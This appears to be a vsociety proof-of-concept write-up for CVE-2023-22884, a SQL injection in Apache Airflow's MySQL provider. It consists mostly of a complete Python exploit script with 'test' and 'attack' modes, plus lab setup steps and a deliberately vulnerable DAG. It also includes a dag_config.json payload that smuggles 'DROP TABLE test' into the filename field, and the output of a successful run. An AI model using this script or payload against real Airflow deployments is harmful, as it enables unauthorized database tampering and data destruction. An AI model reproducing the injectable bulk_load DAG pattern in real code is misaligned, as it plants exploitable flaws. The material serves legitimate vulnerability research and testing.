Summary
Proof of Concept for CVE-2023–22884 that is an Apache Airflow SQL injection vulnerability.
general
1 # @jakabakos
2 # version: 1.1
3 # Tested with Airflow 2.5.0 and MySQL provider 3.4.0
4 # Apache Airflow REST API reference: https://airflow.apache.org/docs/apache-airflow/stable/stable-rest-api-ref.html
5
6 import argparse
7 import json
8 import re
9 import requests
10 from packaging import version
11
12 def get_csrf_token(url):
13 """Get the CSRF token from the login page response"""
14 # Send a GET request to the login page to retrieve the HTML content
15 response = requests.get(url + "/login/")
16
17 # Use regular expression to find the CSRF token from the response HTML
18 pattern = r'<input(?:\s+(?:(?:type|name|id)\s*=\s*"[^"]*"\s*)+)?\s+value="([^"]+)">'
19 csrf_token = re.search(pattern, response.text)
20
21 # Extract the initial session cookie from the response
22 initial_session_cookie = response.cookies.get('session')
23
24 # Check if CSRF token is found in the response and return the session cookie and the token
25 if csrf_token:
26 print("[+] CSRF token found.")
27 return initial_session_cookie, csrf_token.group(1)
28 else:
29 # If CSRF token is not found, print an error message and exit the script
30 print("[-] CSRF token not found. Exiting...")
31 exit(1)
32
33 def login(url, username, password, cookie, csrf_token):
34 """Login to the Apache Airflow web application"""
35 # Prepare the login data with CSRF token, username, and password
36 data = {"csrf_token": csrf_token, "username": username, "password": password}
37
38 # Send a POST request to the login page with the login data and session cookie
39 response = requests.post(
40 url + "/login/",
41 headers={
42 "Content-Type": "application/x-www-form-urlencoded",
43 "Cookie": f"session={cookie}"
44 },
45 data=data
46 )
47
48 # Check if the login was successful or if there was an error
49 if "Invalid login. Please try again." in response.text:
50 print("[+] Login was not successful due to invalid credentials.")
51 exit(1)
52 elif response.status_code != 200:
53 print("[-] Something went wrong with the login process.")
54 elif "Set-Cookie" in response.headers:
55 # If login was successful, extract the new session cookie from the response headers
56 session_cookie = response.headers["Set-Cookie"].split(";")[0].split("=")[1]
57 print(f"[+] Login was successful. Captured session cookie: {session_cookie}")
58 return session_cookie
59
60 def verify_airflow_version(url, session_cookie):
61 """Verify the version of Apache Airflow and check for vulnerability"""
62 # Send a GET request to the Airflow home page to retrieve the HTML content
63 response = requests.get(
64 url + "/home",
65 headers={"Cookie": f"session={session_cookie}"}
66 )
67
68 # Use regular expression to find the version string from the response HTML
69 version_str = re.search(r'v(\d+\.\d+\.\d+)', response.text)
70
71 # Check if the version string is found in the response and extract the version number
72 if version_str:
73 print(f"[+] Airflow version found: {version_str.group(1)}")
74 else:
75 # If version string is not found, print an error message and exit the script
76 print("[-] Airflow version not found.")
77 exit(1)
78
79 # Check if the version is vulnerable (less than or equal to 2.5.0)
80 if version.parse(version_str.group(1)) <= version.parse("2.5.0"):
81 print("[+] Version is vulnerable.")
82 else:
83 print("[-] Airflow version is not vulnerable. Version is above 2.5.0. Exiting...")
84 exit(1)
85
86 def verify_mysql_provider(url, session_cookie):
87 """Verify the version of MySQL provider and check for vulnerability"""
88 # Send a GET request to get the list of providers from the Airflow API
89 response = requests.get(
90 f'{url}/api/v1/providers',
91 headers={"Cookie": f"session={session_cookie}"}
92 )
93 data = response.json()
94 providers = data.get("providers", [])
95
96 # Loop through the list of providers and find the MySQL provider
97 for provider in providers:
98 if provider.get("package_name") == "apache-airflow-providers-mysql":
99 # Check if the version of the MySQL provider is vulnerable (less than or equal to 3.4.0)
100 if version.parse(provider.get("version")) <= version.parse("3.4.0"):
101 print("[+] MySQL provider version is vulnerable.")
102 return
103 else:
104 print("[-] MySQL provider version is not vulnerable. Exiting...")
105 exit(1)
106
107 # If MySQL provider is not found in the list of providers, print an error message and exit the script
108 print("[-] MySQL provider not found. Exiting...")
109 exit(1)
110
111 def verify_connection_id(url, session_cookie, connection_id):
112 """Verify the existence of a provided connection ID or create a new connection using provided JSON data"""
113 # Check if the provided connection ID is a string, indicating an existing connection
114 if isinstance(connection_id, str):
115 # Send a GET request to get the list of connections from the Airflow API
116 response = requests.get(
117 f'{url}/api/v1/connections',
118 headers={"Cookie": f"session={session_cookie}"}
119 )
120 connections = response.json().get("connections", [])
121
122 # Loop through the list of connections and check if the provided connection ID exists
123 found = False
124 for conn in connections:
125 if conn.get("connection_id") == connection_id:
126 # Check if the existing connection is of type "mysql"
127 if conn.get("conn_type") == "mysql":
128 found = True
129 else:
130 print("[-] The provided connection_id is not a 'mysql' type connection. Exiting...")
131 exit(1)
132 if found:
133 print(f"[+] Connection ID '{connection_id}' exists.")
134 return
135 else:
136 print("[-] Submitted connection id does not exist. Exiting...")
137 exit(1)
138
139 # If the connection ID does not exist, try to open it as a JSON file that contains the data for the new connection
140 else:
141 try:
142 with open(connection_id, 'r') as f:
143 conn_data = json.load(f)
144 if not isinstance(conn_data, dict) or not all(key in conn_data for key in ["connection_id", "conn_type", "host", "login", "port", "password"]):
145 print("[-] Invalid JSON format for connection data. Exiting...")
146 exit(1)
147 # Send a POST request to create a new connection using the provided JSON data
148 response = requests.post(
149 url + "/connections",
150 headers={"Cookie": f"session={session_cookie}"},
151 json=conn_data
152 )
153
154 # Check if the connection was successfully created or if there was an error
155 if response.status_code == 200:
156 print(f"[+] Connection was successfully created with name {conn_data['connection_id']}.")
157 print("[+] This connection id should be used by the vulnerable DAG.")
158 else:
159 print("[-] Failed to create the connection. Exiting...")
160 exit(1)
161 except FileNotFoundError:
162 print("[-] The specified connection data file was not found. Exiting...")
163 exit(1)
164 except json.JSONDecodeError:
165 print("[-] Failed to parse the JSON connection data. Exiting...")
166 exit(1)
167
168 def verify_dag_id(url, session_cookie, dag_id):
169 """Verify the existence of a provided DAG ID"""
170 # Send a GET request to get the list of DAGs from the Airflow API
171 response = requests.get(f'{url}/api/v1/dags',
172 headers={"Cookie": f"session={session_cookie}"}
173 )
174
175 dags = response.json().get("dags", [])
176
177 # Check if the provided DAG ID exists in the list of DAGs
178 if any(dag.get("dag_id") == dag_id for dag in dags):
179 print(f"[+] DAG id '{dag_id}' exists.")
180 else:
181 print("[-] DAG id does not exist. Exiting...")
182 exit(1)
183
184 def trigger_dag(url, session_cookie, dag_id, file_path):
185 """Trigger a DAG run with a provided configuration"""
186 endpoint = f"{url}/api/v1/dags/{dag_id}/dagRuns"
187 headers = {
188 "Cookie": f"session={session_cookie}",
189 "accept": "application/json"
190 }
191
192 try:
193 # Read the content of the provided file (should be in JSON format)
194 with open(file_path, 'r') as file:
195 file_content = file.read()
196 try:
197 # Try to parse the JSON content into a Python dictionary
198 payload = json.loads(file_content)
199 except json.JSONDecodeError:
200 # If the provided file content is not valid JSON, exit the script
201 exit(0)
202 except FileNotFoundError:
203 # If the provided file path does not exist, print an error message and return None
204 print("File not found.")
205 return None
206
207 # Prepare the payload for the DAG run with the provided configuration
208 data = {"conf": payload}
209
210 # Send a POST request to trigger the DAG run with the payload configuration
211 response = requests.post(endpoint, headers=headers, json=data)
212
213 # Check if the DAG run was successfully triggered and if it's in "queued" state
214 if response.status_code == 200 and response.json().get("state") == "queued":
215 print("[+] DAG successfully triggered with the provided payload.")
216 else:
217 print("[-] Failed to trigger the DAG. Response:")
218 print(json.dumps(response.json(), indent=4))
219 exit(1)
220
221 def main():
222 # Example text to show usage examples of the script
223 example_text = '''Examples:
224 python3 exploit.py -u admin -p admin --host http://localhost:8080 --mode test -ci mysql -di bulk_load_from_file
225 python3 exploit.py -u admin -p admin --host http://localhost:8080 --mode attack -ci mysql -di bulk_load_from_file -dc dag_config.json
226 '''
227 parser = argparse.ArgumentParser(
228 description="CVE-2023-22884 Apache Airflow SQLi exploit script",
229 epilog=example_text,
230 formatter_class=argparse.RawDescriptionHelpFormatter
231 )
232
233 # Define command-line arguments for the script
234 parser.add_argument("-u", "--username", help="Airflow username.")
235 parser.add_argument("-p", "--password", help="Airflow password.")
236 parser.add_argument("-c", "--cookie", help="Authentication cookie.")
237 parser.add_argument("--host", required=True, help="Host where the airflow is (format: http(s)://host:port).")
238 parser.add_argument("-m", "--mode", required=True, choices=["test", "attack"], help="The mode of the script. Can be: 'test' or 'attack' mode")
239 parser.add_argument("-ci", "--connection-id", help="The connection ID of the MySQL provider. Required in attack mode only. Submit a string if it's existing or a path to a JSON file if should be created.")
240 parser.add_argument("-di", "--dag-id", help="The ID of the DAG to be exploited. Required in attack mode only.")
241 parser.add_argument("-dc", "--dag-config-file", help="Path to a file that stores a the DAG config JSON.")
242
243 args = parser.parse_args()
244
245 # Check if either username and password or the authentication cookie is provided
246 if (args.username and args.password) or args.cookie:
247 url = args.host.rstrip("/")
248 # Check if the URL starts with 'http://' or 'https://' and correct it if needed
249 if not url.startswith("http"):
250 print("[-] Invalid URL format. Please use 'http' or 'https' as the schema. Exiting...")
251 exit(1)
252
253 # Get the session cookie if not provided, by performing login using credentials and CSRF token
254 session_cookie = args.cookie
255 if not session_cookie:
256 initial_session_cookie, csrf_token = get_csrf_token(url)
257 session_cookie = login(url, args.username, args.password, initial_session_cookie, csrf_token)
258
259 if args.mode == "test":
260 print("[+] Running in test mode.")
261 # Verify the version of Apache Airflow and check for vulnerability
262 verify_airflow_version(url, session_cookie)
263
264 # Verify the version of MySQL provider and check for vulnerability
265 verify_mysql_provider(url, session_cookie)
266
267 # Verify the existence of the provided MySQL connection ID
268 verify_connection_id(url, session_cookie, args.connection_id)
269
270 # Verify the existence of the provided DAG ID
271 verify_dag_id(url, session_cookie, args.dag_id)
272
273 print("[+] Exploit successfully finished in test mode. Application is potentially VULNERABLE.")
274 exit(0)
275
276 elif args.mode == "attack":
277 print("[+] Running in attack mode.")
278 # Trigger the DAG run with the provided configuration
279 trigger_dag(url, session_cookie, args.dag_id, args.dag_config_file)
280 print("[+] Exploit successfully finished in attack mode.")
281 else:
282 # If neither credentials nor authentication cookie is provided, print an error message and exit the script
283 print("[-] Either username along with password or the authentication cookie is required. Exiting...")
284 exit(1)
285
286 if __name__ == "__main__":
287 main()
Description
Set up the PoC app
Install Docker and Docker Compose
Follow these instructions:
- Docker: https://docs.docker.com/desktop/install/debian/
- Docker Compose: https://docs.docker.com/compose/install/linux/
Install MySQL
To get a MySQL 8 server, follow this writeup:
sudo apt update && sudo apt -y install wget
wget https://repo.mysql.com//mysql-apt-config_0.8.22-1_all.deb
sudo dpkg -i mysql-apt-config_0.8.22-1_all.deb
sudo apt update
sudo apt install mysql-server
One has to explicitly enable LOAD DATA INFILE functionality in MySQL by setting a variable. The config file on our host machine is located at /etc/mysql/my.cnf
. Add this code to the bottom of the file:
[mysqld]
secure-file-priv = ""
Confirm if MySQL 8.0 was installed as expected:
mysql -u root -p
After passing the password you should see your MySQL console:
Let’s create a table for testing purposes:
CREATE DATABASE airflow;
use airflow;
CREATE TABLE test (data varchar(255));
Install, configure, and run Airflow
We want to run Airflow in Docker with a local MySQL server we own.
This docker compose file seems to work but because the affected Airflow version is using a higher MySQL provider package we have to write our custom install command into a Dockerfile. You can find both files here.
Download the file:
curl -LfO 'https://airflow.apache.org/docs/apache-airflow/2.5.0/docker-compose.yaml'
Then, uncomment the “build .
" line in the docker-compose.yml
:
---
version: '3'
x-airflow-common:
&airflow-common
# In order to add custom dependencies or upgrade provider packages you can use your extended image.
# Comment the image line, place your Dockerfile in the directory where you placed the docker-compose.yaml
# and uncomment the "build" line below, Then run `docker-compose build` to build the images.
image: ${AIRFLOW_IMAGE_NAME:-apache/airflow:2.5.0}
build: . # UNCOMMENTED LINE HERE
environment:
&airflow-common-env
AIRFLOW__CORE__EXECUTOR: CeleryExecutor
AIRFLOW__DATABASE__SQL_ALCHEMY_CONN: postgresql+psycopg2://airflow:airflow@postgres/airflow
# For backward compatibility, with Airflow <2.3
AIRFLOW__CORE__SQL_ALCHEMY_CONN: postgresql+psycopg2://airflow:airflow@postgres/airflow
AIRFLOW__CELERY__RESULT_BACKEND: db+postgresql://airflow:airflow@postgres/airflow
AIRFLOW__CELERY__BROKER_URL: redis://:@redis:6379/0
AIRFLOW__CORE__FERNET_KEY: ''
AIRFLOW__CORE__DAGS_ARE_PAUSED_AT_CREATION: 'true'
AIRFLOW__CORE__LOAD_EXAMPLES: 'true'
AIRFLOW__API__AUTH_BACKENDS: 'airflow.api.auth.backend.basic_auth'
_PIP_ADDITIONAL_REQUIREMENTS: ${_PIP_ADDITIONAL_REQUIREMENTS:-}
volumes:
- ./dags:/opt/airflow/dags
- ./logs:/opt/airflow/logs
- ./plugins:/opt/airflow/plugins
user: "${AIRFLOW_UID:-50000}:0"
depends_on:
&airflow-common-depends-on
redis:
condition: service_healthy
postgres:
condition: service_healthy
[REDACTED]
And also add the install command to a Dockerfile
located in the same folder as the docker-compose.yaml
file.
FROM apache/airflow:2.5.0
RUN pip install apache-airflow-providers-mysql==3.4.0
Additionally, we have to initialize the Airflow environment. As the official tutorial says, “On Linux, the quick-start needs to know your host user id and needs to have group id set to 0
. Otherwise, the files created in dags
, logs
and plugins
will be created with root
user ownership." So run the following commands:
mkdir -p ./dags ./logs ./plugins ./config
echo -e "AIRFLOW_UID=$(id -u)" > .env
Don’t forget to Initialize the database with docker compose up airflow-init
.
And now build and run the Airflow:
docker-compose up --build
As a result, you should see in the logs that the webserver and other components are up and there is a login form under localhost:8080
:
The default username and password is airflow
.
As a final step here we can check whether the installation of the vulnerable provider version was successful or not with this one-liner:
docker exec -it `docker ps | grep webserver | cut -d " " -f1` bash -c "pip freeze | grep apache-airflow-providers-mysql"
The output should be apache-airflow-providers-mysql==3.4.0
.
As a next step, set up a connection for testing purposes under Admin / Connections menu.
Fill in the necessary data to connect to our local MySQL server:
- Connection Id:
mysql
- Connection type:
MySQL
- Host:
localhost
- Shema:
airflow
- Login:
root
(can be any other user based on your MySQL configuration) - Password: password to connect to MySQL server
- Port:
3306
- Extra:
{"local_infile": true}
Lastly, unpause the “bulk_load_from_file
" DAG from the list.
Set up a DAG
The vulnerable code segment is in the MySQL provider’s bulk_load
method, so we need a DAG that is using this method. Let's create one for the proof of concept.
Example DAG that is calling the vulnerable method. This Airflow DAG, named “bulk_load_from_file,” is designed to bulk load data from a file into a MySQL database.
from datetime import datetime, timedelta
from airflow import DAG
from airflow.operators.python_operator import PythonOperator
from airflow.operators.python import get_current_context
from airflow.hooks.mysql_hook import MySqlHook
def get_file_name():
"""Get the user-supplied filename to load into the database from the context"""
context = get_current_context()
return context["params"].get("filename", "test_file")
def get_table_name():
"""Get the user-supplied table name"""
context = get_current_context()
return context["params"].get("table_name", "test_table")
def bulk_load_sql(**kwargs):
"""Call the hook's bulk_load method to load the file content into the database"""
conn = MySqlHook(mysql_conn_id='mysql')
get_filename = get_file_name()
get_tablename = get_table_name()
conn.bulk_load(table=get_tablename, tmp_file=get_filename)
"""Define the DAG"""
dag = DAG(
"bulk_load_from_file",
start_date=datetime(2023, 7, 1),
schedule_interval=None)
"""Define the operator that calls the method to bulk load"""
t1 = PythonOperator(
task_id='bulk_load',
provide_context=True,
python_callable=bulk_load_sql,
dag=dag)
"""Call the operator"""
t1
A high-level overview of the file:
get_file_name()
andget_table_name()
are Python functions defined to retrieve user-supplied parameters "filename" and "table_name" from the context usingget_current_context()
. If the parameters are not provided, the default values "test_file" and "test_table" are used, respectively.bulk_load_sql(**kwargs)
is a Python function that serves as the core task. It uses MySQLHook to establish a connection to the MySQL database with the connection ID "mysql" (assuming it's defined in the Airflow connections). It then calls thebulk_load()
method of the MySQLHook, passing the table name obtained fromget_table_name()
and the filename obtained fromget_file_name()
to load the content of the file into the specified database table. The injection point is thefilename
parameter coming from the context.t1
is a PythonOperator that callsbulk_load_sql
function that is to be executed when this task is triggered.
Exploitation
See the options of the exploit running with -h
.
kali# python3 exploit.py -h
usage: exploit.py [-h] [-u USERNAME] [-p PASSWORD] [-c COOKIE] --host HOST -m {test,attack} [-ci CONNECTION_ID] [-di DAG_ID] [-dc DAG_CONFIG_FILE]
CVE-2023-22884 Apache Airflow SQLi exploit script
options:
-h, --help show this help message and exit
-u USERNAME, --username USERNAME
Airflow username.
-p PASSWORD, --password PASSWORD
Airflow password.
-c COOKIE, --cookie COOKIE
Authentication cookie.
--host HOST Host where the airflow is (format: http(s)://host:port).
-m {test,attack}, --mode {test,attack}
The mode of the script. Can be: 'test' or 'attack' mode
-ci CONNECTION_ID, --connection-id CONNECTION_ID
The connection ID of the MySQL provider. Required in attack mode only. Submit a string if it's existing or a path to a JSON file if
should be created.
-di DAG_ID, --dag-id DAG_ID
The ID of the DAG to be exploited. Required in attack mode only.
-dc DAG_CONFIG_FILE, --dag-config-file DAG_CONFIG_FILE
Path to a file that stores a the DAG config JSON.
Examples:
python3 exploit.py -u admin -p admin --host http://localhost:8080 --mode test -ci mysql -di bulk_load_from_file
python3 exploit.py -u admin -p admin --host http://localhost:8080 --mode attack -ci mysql -di bulk_load_from_file -dc dag_config.json
Test mode
Let’s run our script in test mode first:
kali# python3 exploit.py -u admin -p admin --host http://localhost:8080 --mode test -ci mysql -di bulk_load_from_file
[+] CSRF token found.
[+] Login was successful. Captured session cookie: 64a9c813-e006-43e0-9c86-5877d0114491.2TxBJcJw4gH_JBVed5An6Qyu5Bc
[+] Running in test mode.
[+] Airflow version found: 2.5.0
[+] Version is vulnerable.
[+] MySQL provider version is vulnerable.
[+] Connection ID '{connection_id}' exists.
[+] DAG id 'bulk_load_from_file' exists.
[+] Exploit successfully finished in test mode. Application is potentially VULNERABLE.
Attack mode
Then, in attack mode.
Check the MySQL table Airflow’s table first:
Create a dag_config.json that will be attached as a JSON config file to the DAG trigger. The malicious code injection is in the filename part:
dag_config.json
:
{
"filename": "/tmp/test_file' INTO TABLE test; DROP TABLE test; --",
"table_name": "test"
}
Then, run the script in attack mode:
# python3 exploit.py -u admin -p admin --host http://localhost:8080 --mode attack -ci mysql -di bulk_load_from_file -dc dag_config.json
[+] CSRF token found.
[+] Login was successful. Captured session cookie: c0ffe971-a21a-459d-be71-e938742ebbb2.e80LLzIs5n2PvttPfJIHBPjgIrc
[+] Running in attack mode.
[+] DAG successfully triggered with the provided payload.
[+] Exploit successfully finished in attack mode.
Wait a couple of seconds and then check if the exploit payload was successfully executed:
Tadaaam!
Flowchart diagram
Join vsociety: https://vsociety.io/
Checkout our discord: https://discord.gg/sHJtMteYHQ